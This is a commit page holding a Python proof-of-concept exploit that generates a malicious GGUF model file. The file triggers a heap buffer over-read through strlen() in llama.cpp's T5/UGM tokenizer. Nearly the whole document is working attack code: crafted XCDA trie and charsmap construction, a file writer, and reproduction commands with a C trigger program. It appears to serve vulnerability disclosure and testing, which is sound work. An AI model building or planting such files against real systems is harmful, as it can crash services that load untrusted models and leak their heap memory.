salvepilo committed on
Commit 2e555e8 · verified · 1 Parent(s): 30982be

Upload poc_strlen_oob.py with huggingface_hub

Files changed (1): poc_strlen_oob.py (added, +571 lines)
#!/usr/bin/env python3
"""
PoC: Heap buffer over-read via strlen() on unterminated precompiled_charsmap
in llama.cpp's UGM (T5) tokenizer.

Vulnerability location:
    src/llama-vocab.cpp, function normalize_prefix(), around lines 1128-1129:

        const char * prefix_replacement = &(tokenizer.prefix_replacements)[longest_prefix_offset];
        return { prefix_replacement, strlen(prefix_replacement), longest_prefix_length };

The precompiled_charsmap is loaded from GGUF metadata at lines 1823-1825 without
any validation that replacement strings are null-terminated. When the XCDA trie
matches an input prefix and yields a replacement-string offset that points to data
near the end of the buffer with no trailing NUL byte, strlen() reads past the end
of the heap allocation.

Exploit path:
    1. A GGUF file sets tokenizer.ggml.model = "t5" to select the UGM tokenizer.
    2. tokenizer.ggml.precompiled_charsmap contains a crafted binary blob:
           [4 bytes: xcda_blob_size (uint32 LE)]
           [xcda_blob_size bytes: XCDA trie entries (uint32 LE each)]
           [remaining bytes: prefix_replacements string table]
    3. The XCDA trie is constructed so that the ASCII character 'A' (0x41) matches
       a single-character prefix whose replacement-string offset points to the very
       last byte of the prefix_replacements region -- a byte that is NOT followed by
       a NUL terminator.
    4. When the model tokenizes any text containing 'A', normalize_prefix() walks
       the XCDA, finds the match, passes the bounds check (offset < size), then
       calls strlen() which reads past the buffer boundary.

XCDA bit-packing (per uint32_t entry):
    bits 10-30: BASE value (21 bits)
    bit 9:      BASE shift flag (if set, BASE is shifted left by 8)
    bit 8:      LEAF flag
    bits 0-7:   LCHECK value
For value nodes (referenced when LEAF=1):
    bits 0-30: replacement string offset into prefix_replacements
    bit 31:    (flag, masked out by get_value)

Trie walk for input character c:
    node_index = get_base(root)          # start from root
    node_index ^= c                      # XOR with character value
    check get_lcheck(node_index) == c    # verify parentage
    is_leaf = get_leaf(node_index)
    node_index ^= get_base(node_index)   # descend
    if is_leaf:
        offset = get_value(node_index)   # read replacement offset

This PoC constructs a minimal GGUF file that triggers the bug when loaded
with vocab_only=true and any text containing 'A' is tokenized.

Usage:
    python3 poc_strlen_oob.py   # generates poc_strlen_oob.gguf
    # Then in the llama.cpp build directory:
    #   ./bin/llama-cli -m poc_strlen_oob.gguf --vocab-only -p "A" 2>&1
    # (will crash, or ASAN will report a heap-buffer-overflow)
"""

import struct
import os
import sys

# --------------------------------------------------------------------------- #
# GGUF binary format constants
# --------------------------------------------------------------------------- #
GGUF_MAGIC = 0x46554747  # "GGUF" in little-endian
GGUF_VERSION = 3

# GGUFValueType enum
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12

# GGML quantization types
GGML_TYPE_F32 = 0

ALIGNMENT = 32

def pack_string(s: str) -> bytes:
    """Pack a GGUF string value: uint64 length + raw UTF-8 bytes."""
    encoded = s.encode("utf-8")
    return struct.pack("<Q", len(encoded)) + encoded


def pack_kv_string(key: str, value: str) -> bytes:
    """Pack a complete KV pair with a string value."""
    return pack_string(key) + struct.pack("<I", GGUF_TYPE_STRING) + pack_string(value)


def pack_kv_uint32(key: str, value: int) -> bytes:
    """Pack a complete KV pair with a uint32 value."""
    return pack_string(key) + struct.pack("<I", GGUF_TYPE_UINT32) + struct.pack("<I", value)


def pack_kv_float32(key: str, value: float) -> bytes:
    """Pack a complete KV pair with a float32 value."""
    return pack_string(key) + struct.pack("<I", GGUF_TYPE_FLOAT32) + struct.pack("<f", value)


def pack_kv_int8_array(key: str, data: bytes) -> bytes:
    """Pack a complete KV pair with an array of uint8 (used for precompiled_charsmap)."""
    result = pack_string(key)
    result += struct.pack("<I", GGUF_TYPE_ARRAY)  # value type = ARRAY
    result += struct.pack("<I", GGUF_TYPE_UINT8)  # array element type = UINT8
    result += struct.pack("<Q", len(data))        # array length
    result += data                                # raw bytes
    return result


def pack_kv_string_array(key: str, strings: list) -> bytes:
    """Pack a complete KV pair with an array of strings."""
    result = pack_string(key)
    result += struct.pack("<I", GGUF_TYPE_ARRAY)
    result += struct.pack("<I", GGUF_TYPE_STRING)
    result += struct.pack("<Q", len(strings))
    for s in strings:
        result += pack_string(s)
    return result


def pack_kv_float32_array(key: str, values: list) -> bytes:
    """Pack a complete KV pair with an array of float32."""
    result = pack_string(key)
    result += struct.pack("<I", GGUF_TYPE_ARRAY)
    result += struct.pack("<I", GGUF_TYPE_FLOAT32)
    result += struct.pack("<Q", len(values))
    for v in values:
        result += struct.pack("<f", v)
    return result


def pack_kv_int32_array(key: str, values: list) -> bytes:
    """Pack a complete KV pair with an array of int32."""
    result = pack_string(key)
    result += struct.pack("<I", GGUF_TYPE_ARRAY)
    result += struct.pack("<I", GGUF_TYPE_INT32)
    result += struct.pack("<Q", len(values))
    for v in values:
        result += struct.pack("<i", v)
    return result


# --------------------------------------------------------------------------- #
# XCDA trie construction helpers
# --------------------------------------------------------------------------- #

def pack_xcda_node(base: int, lcheck: int, leaf: bool, base_shift: bool = False) -> int:
    """
    Pack an XCDA node into a uint32.

    Layout:
        bits 10-30: BASE (21 bits, before optional shift)
        bit 9:      shift flag (if 1, actual BASE = stored_base << 8)
        bit 8:      LEAF flag
        bits 0-7:   LCHECK

    When base_shift=False: stored_base = base,      actual = stored_base << 0
    When base_shift=True:  stored_base = base >> 8, actual = stored_base << 8
    """
    assert 0 <= lcheck <= 0xFF
    assert 0 <= base <= 0x1FFFFF  # 21 bits max for the stored base

    packed = 0
    if base_shift:
        stored_base = base >> 8
        packed |= (stored_base & 0x1FFFFF) << 10
        packed |= (1 << 9)  # shift flag
    else:
        packed |= (base & 0x1FFFFF) << 10
        # bit 9 = 0 (no shift)

    if leaf:
        packed |= (1 << 8)

    packed |= (lcheck & 0xFF)
    return packed


def pack_xcda_value_node(offset: int) -> int:
    """
    Pack a value node. get_value() returns packed & 0x7FFFFFFF.
    The offset is the index into prefix_replacements.
    """
    assert 0 <= offset <= 0x7FFFFFFF
    return offset


# --------------------------------------------------------------------------- #
# Build the malicious precompiled_charsmap
# --------------------------------------------------------------------------- #

def build_malicious_charsmap() -> bytes:
    """
    Build a precompiled_charsmap blob that triggers an OOB read via strlen().

    The XCDA trie matches the single ASCII character 'A' (0x41) and returns
    a replacement-string offset pointing to the last byte of the
    prefix_replacements section, which has NO null terminator.

    IMPORTANT: During model loading, llama.cpp tokenizes "\\n" to determine
    the newline token ID (line 2180 of llama-vocab.cpp). This means the XCDA
    trie is walked for character 0x0A during init. We must ensure the array
    is large enough that BASE_root ^ c doesn't go out of bounds for ANY
    single-byte character. We use BASE_root = 0, so the child index for
    character c is simply c. The array needs 256 entries to be safe.

    XCDA array layout (256 entries):
        [0]    Root node: BASE=0, LCHECK=0, LEAF=0
        [0x41] Child for 'A': LCHECK=0x41, LEAF=1, BASE=3
               After XOR: node_index = 0x41 ^ 3 = 0x42
        [0x42] Value node: offset pointing to last byte of prefix_replacements
        All other entries: 0 (LCHECK=0, won't match any non-zero char)

    Trie walk for input 'A' (c=0x41):
        1. node_index = get_base(0) = 0
        2. node_index ^= 0x41            => 0x41
        3. get_lcheck(0x41) = 0x41       => matches!
        4. get_leaf(0x41) = true
        5. node_index ^= get_base(0x41)  => 0x41 ^ 3 = 0x42
        6. get_value(0x42) = replacement_offset => points to unterminated data

    Trie walk for any other char c (e.g. '\\n' = 0x0A):
        1. node_index = get_base(0) = 0
        2. node_index ^= c               => c
        3. get_lcheck(c) = 0 (entry is all zeros) => 0 != c => break
        => No match, falls through to UTF-8 passthrough. Safe.

    prefix_replacements: non-NUL bytes with NO trailing NUL terminator.
    """

    # Build the XCDA array: 256 entries, all zeros except the ones we need
    NUM_ENTRIES = 256
    xcda = [0] * NUM_ENTRIES

    # Root (index 0): BASE=0, LEAF=0, LCHECK=0
    # With BASE=0, for character c, node_index = 0 ^ c = c
    # So the child for 'A' (0x41) is at index 0x41
    xcda[0] = pack_xcda_node(base=0, lcheck=0x00, leaf=False)

    # Child for 'A' at index 0x41:
    #   LCHECK=0x41 (must match the character)
    #   LEAF=1      (this completes a match)
    #   BASE=3      (after XOR: 0x41 ^ 3 = 0x42, the value node)
    xcda[0x41] = pack_xcda_node(base=3, lcheck=0x41, leaf=True)

    # Value node at index 0x42:
    #   get_value() returns packed & 0x7FFFFFFF = the replacement offset.
    #   We point to the last byte of prefix_replacements (no NUL follows).
    replacement_offset = 7
    xcda[0x42] = pack_xcda_value_node(replacement_offset)

    # Pack all entries
    xcda_entries = struct.pack("<" + "I" * NUM_ENTRIES, *xcda)
    xcda_blob_size = len(xcda_entries)  # 256 * 4 = 1024 bytes

    # prefix_replacements: 8 bytes of non-NUL data, NO null terminator.
    # The replacement offset (7) points to the 8th byte (index 7).
    # strlen() starts there, finds 'B' (0x42), then reads PAST the buffer
    # looking for a NUL that doesn't exist.
    prefix_replacements = b"\x42" * 8  # 'B' * 8, no NUL

    # Full charsmap: [uint32 xcda_blob_size] [xcda_entries] [prefix_replacements]
    charsmap = struct.pack("<I", xcda_blob_size) + xcda_entries + prefix_replacements

    return charsmap


# --------------------------------------------------------------------------- #
# Verify the trie walk in Python (sanity check)
# --------------------------------------------------------------------------- #

def verify_trie_walk(charsmap: bytes):
    """Simulate the C++ trie walk to verify that our XCDA is correct."""

    # Parse the charsmap
    xcda_blob_size = struct.unpack_from("<I", charsmap, 0)[0]
    charsmap_offset = 4
    xcda_array = []
    for i in range(xcda_blob_size // 4):
        val = struct.unpack_from("<I", charsmap, charsmap_offset + i * 4)[0]
        xcda_array.append(val)
    prefix_replacements_offset = 4 + xcda_blob_size
    prefix_replacements_size = len(charsmap) - prefix_replacements_offset
    prefix_replacements = charsmap[prefix_replacements_offset:]

    print(f"[*] Charsmap total size: {len(charsmap)} bytes")
    print(f"[*] XCDA blob size: {xcda_blob_size} bytes ({xcda_blob_size // 4} entries)")
    non_zero = {i: x for i, x in enumerate(xcda_array) if x != 0}
    print(f"[*] XCDA non-zero entries: { {i: '0x%08X' % x for i, x in non_zero.items()} }")
    print(f"[*] prefix_replacements size: {prefix_replacements_size} bytes")
    print(f"[*] prefix_replacements (hex): {prefix_replacements.hex()}")
    print(f"[*] prefix_replacements contains NUL: {0 in prefix_replacements}")
    print()

    def get_base(index):
        packed = xcda_array[index]
        return (packed >> 10) << ((packed & (1 << 9)) >> 6)

    def get_lcheck(index):
        packed = xcda_array[index]
        return packed & ((1 << 31) | 0xFF)

    def get_leaf(index):
        packed = xcda_array[index]
        return bool((packed >> 8) & 1)

    def get_value(index):
        packed = xcda_array[index]
        return packed & ((1 << 31) - 1)

    # Simulate the walk for character 'A' (0x41)
    input_char = ord('A')
    print(f"[*] Simulating trie walk for character 'A' (0x{input_char:02X})...")

    node_index = 0
    base_root = get_base(node_index)
    print(f"    Root node[0] packed=0x{xcda_array[0]:08X}, get_base(0)={base_root}")
    node_index = base_root

    c = input_char
    node_index ^= c
    print(f"    node_index ^= 0x{c:02X} => node_index = {node_index}")

    lcheck = get_lcheck(node_index)
    print(f"    node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
    print(f"    get_lcheck({node_index}) = 0x{lcheck:08X}")
    if lcheck != c:
        print(f"    [!] LCHECK mismatch: 0x{lcheck:X} != 0x{c:X}")
        return False
    print(f"    LCHECK matches: 0x{lcheck:X} == 0x{c:X}")

    is_leaf = get_leaf(node_index)
    print(f"    get_leaf({node_index}) = {is_leaf}")

    base_child = get_base(node_index)
    node_index ^= base_child
    print(f"    get_base({node_index ^ base_child}) = {base_child}")
    print(f"    node_index ^= {base_child} => node_index = {node_index}")

    if is_leaf:
        value = get_value(node_index)
        print(f"    node[{node_index}] packed=0x{xcda_array[node_index]:08X}")
        print(f"    get_value({node_index}) = {value}")
        print(f"    => longest_prefix_offset = {value}")
        print(f"    => Bounds check: {value} < {prefix_replacements_size} = {value < prefix_replacements_size}")
        print(f"    => String at offset {value}: {prefix_replacements[value:]!r}")
        print(f"    => Contains NUL after offset: {0 in prefix_replacements[value:]}")
        if value < prefix_replacements_size and 0 not in prefix_replacements[value:]:
            print()
            print("    [!] VULNERABILITY CONFIRMED: strlen() will read past the buffer!")
            print(f"    [!] prefix_replacement points to byte {value} of {prefix_replacements_size}")
            print("    [!] No NUL terminator exists -- strlen() causes a heap over-read")
            return True
        else:
            print("    [-] No vulnerability (null terminator present or offset OOB)")
            return False
    else:
        print("    [-] Not a leaf node, no match")
        return False


# --------------------------------------------------------------------------- #
# Build the minimal GGUF file
# --------------------------------------------------------------------------- #

def build_gguf(charsmap: bytes, output_path: str):
    """
    Build a minimal GGUF file that:
      - Sets the architecture to "t5" (to trigger the UGM tokenizer path)
      - Provides the malicious precompiled_charsmap
      - Includes a minimal token vocabulary (pad, eos, unk + a few normal tokens)
      - Can be loaded with vocab_only=true (no tensors needed)
    """

    # ---- KV metadata ----
    kv_pairs = bytearray()

    # general.architecture = "t5"
    # (Required: determines the model architecture for key formatting)
    kv_pairs += pack_kv_string("general.architecture", "t5")

    # tokenizer.ggml.model = "t5" (triggers LLAMA_VOCAB_TYPE_UGM)
    kv_pairs += pack_kv_string("tokenizer.ggml.model", "t5")

    # Token list: we need at least 3 tokens for the special token IDs:
    #   0 = pad, 1 = eos, 2 = unk
    # plus some normal tokens for the tokenizer to work.
    # The UGM tokenizer needs at least one normal token to avoid issues.
    tokens = [
        "<pad>",    # 0 - pad token
        "</s>",     # 1 - eos token
        "<unk>",    # 2 - unk token
        "\u2581A",  # 3 - normal token: escaped space (U+2581) + "A"
        "\u2581B",  # 4 - normal token: escaped space (U+2581) + "B"
        "A",        # 5 - normal token: bare "A"
        "B",        # 6 - normal token: bare "B"
    ]
    kv_pairs += pack_kv_string_array("tokenizer.ggml.tokens", tokens)

    # Token scores (float32 array, same length as tokens)
    scores = [0.0, 0.0, 0.0, -1.0, -1.0, -2.0, -2.0]
    kv_pairs += pack_kv_float32_array("tokenizer.ggml.scores", scores)

    # Token types (int32 array):
    #   1 = NORMAL, 2 = UNKNOWN, 3 = CONTROL, 4 = USER_DEFINED, 5 = UNUSED, 6 = BYTE
    token_types = [
        3,  # pad - CONTROL
        3,  # eos - CONTROL
        2,  # unk - UNKNOWN
        1,  # normal
        1,  # normal
        1,  # normal
        1,  # normal
    ]
    kv_pairs += pack_kv_int32_array("tokenizer.ggml.token_type", token_types)

    # EOS token ID
    kv_pairs += pack_kv_uint32("tokenizer.ggml.eos_token_id", 1)

    # UNK token ID
    kv_pairs += pack_kv_uint32("tokenizer.ggml.unknown_token_id", 2)

    # Padding token ID
    kv_pairs += pack_kv_uint32("tokenizer.ggml.padding_token_id", 0)

    # The malicious precompiled_charsmap
    kv_pairs += pack_kv_int8_array("tokenizer.ggml.precompiled_charsmap", charsmap)

    n_kv = 9  # count of KV pairs above

    # ---- Tensor info ----
    # vocab_only mode: no tensors needed.
    n_tensors = 0

    # ---- Write the GGUF file ----
    with open(output_path, "wb") as f:
        # Header
        f.write(struct.pack("<I", GGUF_MAGIC))    # magic
        f.write(struct.pack("<I", GGUF_VERSION))  # version
        f.write(struct.pack("<Q", n_tensors))     # tensor count
        f.write(struct.pack("<Q", n_kv))          # kv count

        # KV data
        f.write(kv_pairs)

        # No tensor info, no tensor data

    file_size = os.path.getsize(output_path)
    print(f"[+] Written GGUF file: {output_path} ({file_size} bytes)")


# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #

def main():
    print("=" * 72)
    print("PoC: Heap buffer over-read via strlen() on unterminated")
    print("     precompiled_charsmap in llama.cpp UGM tokenizer")
    print("=" * 72)
    print()
    print("Vulnerability: src/llama-vocab.cpp, normalize_prefix()")
    print("Lines ~1128-1129:")
    print('    const char * prefix_replacement =')
    print('        &(tokenizer.prefix_replacements)[longest_prefix_offset];')
    print('    return { prefix_replacement, strlen(prefix_replacement),')
    print('             longest_prefix_length };')
    print()
    print("The precompiled_charsmap blob is loaded from GGUF metadata without")
    print("validating that replacement strings are null-terminated. If the XCDA")
    print("trie matches an input prefix and returns an offset pointing to data")
    print("near the buffer end with no NUL byte, strlen() reads past the heap")
    print("allocation boundary.")
    print()

    # Step 1: Build the malicious charsmap
    print("-" * 72)
    print("Step 1: Building malicious precompiled_charsmap")
    print("-" * 72)
    charsmap = build_malicious_charsmap()

    # Step 2: Verify the trie walk
    print()
    print("-" * 72)
    print("Step 2: Verifying XCDA trie walk (Python simulation)")
    print("-" * 72)
    print()
    vuln_confirmed = verify_trie_walk(charsmap)
    print()

    if not vuln_confirmed:
        print("[!] Trie verification failed. Aborting.")
        sys.exit(1)

    # Step 3: Build the GGUF file
    print("-" * 72)
    print("Step 3: Building malicious GGUF file")
    print("-" * 72)
    output_dir = os.path.dirname(os.path.abspath(__file__))
    output_path = os.path.join(output_dir, "poc_strlen_oob.gguf")
    build_gguf(charsmap, output_path)

    # Step 4: Print reproduction instructions
    print()
    print("-" * 72)
    print("Step 4: Reproduction")
    print("-" * 72)
    print()
    print("To trigger the vulnerability, load the GGUF file and tokenize any")
    print("text containing 'A'. The XCDA trie will match 'A' and return a")
    print("replacement-string offset pointing to the last byte of the")
    print("prefix_replacements buffer, which has no null terminator.")
    print()
    print("With AddressSanitizer (ASAN):")
    print()
    print("    # Build llama.cpp with ASAN:")
    print("    cmake -B build -DLLAMA_SANITIZE_ADDRESS=ON")
    print("    cmake --build build")
    print()
    print("    # Trigger with llama-cli:")
    print("    ./build/bin/llama-cli \\")
    print(f"        -m {output_path} \\")
    print("        --vocab-only \\")
    print("        -p \"Hello A world\"")
    print()
    print("Expected ASAN output:")
    print("    ==PID==ERROR: AddressSanitizer: heap-buffer-overflow")
    print("    READ of size N at 0xADDR")
    print("        #0 strlen")
    print("        #1 llm_tokenizer_ugm_session::normalize_prefix()")
    print()
    print("Without ASAN, the over-read may:")
    print("  - Silently leak heap data into replacement strings")
    print("  - Cause a segfault if the read crosses a page boundary")
    print("  - Produce garbled tokenization output")
    print()
    print("Alternatively, use a simple C program to load vocab_only and tokenize:")
    print()
    print("    // trigger.c")
    print("    #include \"llama.h\"")
    print("    int main() {")
    print("        llama_backend_init();")
    print("        struct llama_model_params mp = llama_model_default_params();")
    print("        mp.vocab_only = true;")
    print(f'        struct llama_model * m = llama_model_load_from_file("{output_path}", mp);')
    print("        const struct llama_vocab * v = llama_model_get_vocab(m);")
    print("        llama_token tokens[64];")
    print('        int n = llama_tokenize(v, "A", 1, tokens, 64, false, true);')
    print("        llama_model_free(m);")
    print("        llama_backend_free();")
    print("    }")
    print()
    print("=" * 72)
    print("PoC generation complete.")
    print("=" * 72)


if __name__ == "__main__":
    main()